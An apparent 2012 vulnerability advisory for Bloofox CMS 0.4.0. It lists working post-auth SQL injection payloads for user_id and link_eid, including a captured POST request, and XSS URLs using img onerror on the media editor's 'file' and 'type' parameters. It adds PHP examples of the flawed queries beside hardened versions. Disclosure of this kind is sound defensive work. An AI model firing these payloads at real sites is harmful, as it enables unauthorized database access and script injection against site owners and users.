Thursday 8 March 2012

SQL injection/XSS in latest Bloofox CMS 0.4.0

# TITLE ....... # Multiple Post-auth sql injection/xss in Bloofox CMS 0.4.0 .... #
# DATE ........ # 08.03.2012
# AUTHOR ...... # http://hauntit.blogspot.com
# SOFT LINK ... # http://www.bloofox.com/
# VERSION ..... # 0.4.0
# TESTED ON ... # LAMP
# .............................................................................. #

# 1. What is this?
# 2. What is the type of vulnerability?
# 3. Where is the bug :)
# 4. More...

#............................................#
# 1. What is this?
This is a very nice CMS, you should try it! ;)

#............................................#
# 2. What is the type of vulnerability?
This is an SQL injection bug, but the important fact is that this vulnerability
can be triggered only by a user with the 'editor' role (post-auth).

#............................................#
# 3. Where is the bug :)
# A) sqli

Log in as an 'editor'-role user.

http://bloofoxCMS_0.4.0/admin/index.php?page=profiles&user_id=;'

And here is the view from the source code:
...cut...
bloofoxCMS_0.4.0/admin$ grep -n -r -e "uid" ./ | grep -e "\\$"| grep GET
./include/inc_user_user.php:152:        $db->query("SELECT * FROM ".$tbl_prefix."sys_user WHERE uid = '".$_GET['userid']."' ORDER BY uid LIMIT 1");
./include/inc_user_user.php:210:        $db->query("SELECT uid,username FROM ".$tbl_prefix."sys_user WHERE uid = '".$_GET['userid']."' ORDER BY uid LIMIT 1");
...cut...

Try this:
&user_id=2' or '1'%3d'2
&user_id=2' or '2'%3d'2

;)

#............................................#
# B) sqli-02

...cut from Burp...
POST /www/lastz/bloofoxcms/bloofoxCMS_0.4.0/admin/index.php?mode=content&action=new HTTP/1.1
Host: localhost
(...)
Connection: close

name=AAAAAAAA3&link_type=3&link_url=&link_eid=1'%20and%20password%20%3d%20'1'%20or%20'1'%3d'1'&link_plugin=3&insert=1&insert_where=0&link_target=&link_param=&blocked=0&invisible=0&startdate=&enddate=&keywords=&description=&template_id=0&send=Add+Page

...cut from Burp...

The vulnerable parameter is link_eid.
This command should help you find the vulnerable code:
@bloofoxCMS_0.4.0/admin$ grep -n -r -e link_eid ./

Other vulnerable parameters are "insert" and "eid".

#............................................#
# C) xss

All parameters are vulnerable to XSS too.

#............................................#
# xss-02

http://bloofoxCMS_0.4.0/admin/index.php?mode=content&page=media&action=edit&file=%22%2f%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E%3C&type=1
http://bloofoxCMS_0.4.0/admin/index.php?mode=content&page=media&action=edit&file=de.gif&type=%22}}%27%22%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E

Vulnerable parameters: 'file'.
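The two media URLs above put the payload inside a quoted HTML attribute, and the leading %22 (a double quote) is what closes that attribute. As an added example (not Bloofox code), here is a reflection of 'file' and 'type' written first the unsafe way and then encoded for the attribute context; the form markup is an assumption, and treating 'type' as a small numeric selector is inferred from the type=1 in the URLs:

```php
<?php
// Added example, not Bloofox code. The form markup is an assumption; the
// payload below is the one from the first media URL in this section.

// Vulnerable pattern: the raw value lands inside a quoted attribute, so a
// value starting with a double quote closes the attribute and appends its
// own tag (here an <img> with an onerror handler).
function media_form_vulnerable(string $file, string $type): string
{
    return '<input type="text" name="file" value="' . $file . '">'
         . '<input type="hidden" name="type" value="' . $type . '">';
}

// Encode for an HTML attribute: ENT_QUOTES covers both quote characters,
// ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened pattern: restrict the values to what the page can actually use,
// then encode on output regardless of what the validation let through.
function media_form_safe(string $file, string $type): string
{
    // A media file name: letters, digits, dot, dash, underscore; no path
    // separators, quotes or angle brackets.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$/', $file)) {
        $file = '';
    }
    // 'type' is assumed to be a small numeric selector (type=1 in the URLs).
    $type = ctype_digit($type) ? $type : '0';
    return '<input type="text" name="file" value="' . attr($file) . '">'
         . '<input type="hidden" name="type" value="' . attr($type) . '">';
}

// Constructed check using the payload from the first URL, URL-decoded.
$payload = urldecode('%22%2f%3E%3Cimg%20src%3ddef%20onerror%3daBlert%2812312312323%29%3E%3C');

// The unsafe form ends up with a live <img> tag in the markup.
echo media_form_vulnerable($payload, '1'), PHP_EOL;
// The safe form rejects the name and encodes whatever is left.
echo media_form_safe($payload, '1'), PHP_EOL;
// A normal file name from the second URL passes through unchanged.
echo media_form_safe('de.gif', '1'), PHP_EOL;
```

Validation alone is not enough here: the whitelist keeps odd names out of the database, but htmlspecialchars() on output is what guarantees that nothing reaching the attribute can break out of it.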

Some more SQLi you should find here too:
when updating your profile (as an editor) at /admin/index.php?page=myprofile,
try these parameters for test attacks: showemail, gender, be_lang, be_tmpl
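Sections A and B and the myprofile note above all come down to the same defect visible in the grep output: a request value is concatenated straight into the SQL string, so a single quote rewrites the WHERE clause. As an added example (not Bloofox code), here is that query pattern next to a hardened version using PDO prepared statements; the PDO connection, the in-memory SQLite table, the $tbl_prefix value and the sys_user column layout are assumptions for illustration, and the same treatment applies to user_id, link_eid, insert, eid and the profile fields:

```php
<?php
// Added example, not Bloofox code. PDO, the SQLite table and the column
// layout of sys_user are assumptions made for this demonstration.

// Vulnerable pattern (the shape of the inc_user_user.php query above): the
// request value becomes part of the SQL text, so "2' or '2'='2" turns the
// lookup into "uid = '2' or '2'='2'".
function find_user_vulnerable(PDO $pdo, string $tbl_prefix, string $userid): ?array
{
    $sql = "SELECT uid, username FROM " . $tbl_prefix . "sys_user WHERE uid = '"
         . $userid . "' ORDER BY uid LIMIT 1";
    $row = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened pattern: check the type, then pass the value as a bound parameter
// so it never reaches the database as SQL text.
function find_user_safe(PDO $pdo, string $tbl_prefix, $userid): ?array
{
    // uid is an integer key: reject anything that is not a positive integer.
    $uid = filter_var($userid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($uid === false) {
        return null;
    }
    // The prefix is configuration, not request data, but identifiers cannot
    // be bound as parameters, so keep it to a strict whitelist anyway.
    if (!preg_match('/^[A-Za-z0-9_]{0,32}$/', $tbl_prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    $stmt = $pdo->prepare(
        "SELECT uid, username FROM {$tbl_prefix}sys_user WHERE uid = :uid ORDER BY uid LIMIT 1"
    );
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demonstration with an in-memory SQLite database (no MySQL needed).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE sys_user (uid INTEGER PRIMARY KEY, username TEXT, password TEXT)");
$pdo->exec("INSERT INTO sys_user VALUES (1, 'admin', 'x'), (2, 'editor', 'y')");

// With the tautology from section A the vulnerable query no longer selects
// uid 2; the OR makes every row match and LIMIT 1 returns the first one.
var_dump(find_user_vulnerable($pdo, '', "2' or '2'='2"));
// The hardened lookup refuses the value before any SQL is built...
var_dump(find_user_safe($pdo, '', "2' or '2'='2"));
// ...and still serves a well-formed request.
var_dump(find_user_safe($pdo, '', '2'));
```

The two inputs from section A ('1'='2' versus '2'='2') differ only in whether the appended condition is true, which is why they produce different pages on the vulnerable build and the same "no such user" result on the hardened one.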

#............................................#
# 4. More...

- http://hauntit.blogspot.com
- http://www.google.com
- http://portswigger.net


#............................................#
# Best regards
#

